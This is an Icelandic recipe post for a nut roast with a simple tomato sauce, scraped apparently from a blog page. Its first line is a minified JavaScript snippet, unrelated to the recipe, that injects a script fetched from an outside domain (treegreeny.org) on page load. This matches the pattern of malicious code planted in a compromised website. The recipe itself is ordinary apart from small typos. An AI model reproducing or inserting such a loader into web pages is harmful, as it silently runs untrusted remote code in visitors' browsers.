;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Ég hef aldrei búið til hnetusteik áður en hef hins vegar búið til alls kyns grænmetisbuff og bollur. Ég rakst á uppskrift í veislubók Nóatúns en aðlagaði hana örlítið. Ég fer ekki endilega út í búð til að kaupa akkúrat það sem er gefið upp í uppskriftum, reyni frekar að nýta það sem ég á til í skápunum.
Steikið lauk og sveppi á pönnu ásamt hvítlauknum í nokkrar mínútur þar til laukurinn verður glær, ekki brúna hann. Kælið. Smyrjið eldfast form sem er 14×21 sm og klæðið það með bökunarpappír. Setjið hneturnar í matvinnsluvél, malið þær en passið að þær verði ekk alveg að mauki. Blandið saman sveppablöndunni,hnetunum,ostinum, parmesan, eggi og byggmjöli í skál og hrærið vel saman.
Kryddið með salti og pipar, setjið í formið og bakið við 180 gráður í 45-60 mínútur. Látið steikina standa í 5-10 mínútur áður en hún er borin fram. Lyftið steikinni með bökunarpappírnum og setjið á disk.
Tómatsósa
1 laukur fínsaxaður1-2 msk extra virgin ólífuolía
2 hvítlauksgeirar pressaðir
1 dós tómatar
1 msk tómatpúrra
1 tsk sykur
Steikið laukirnn og hvítlaukinn í olíunni í 3 mínútur eða þar til glær, bætið restinni út í og sjóðið í 5 mínútur.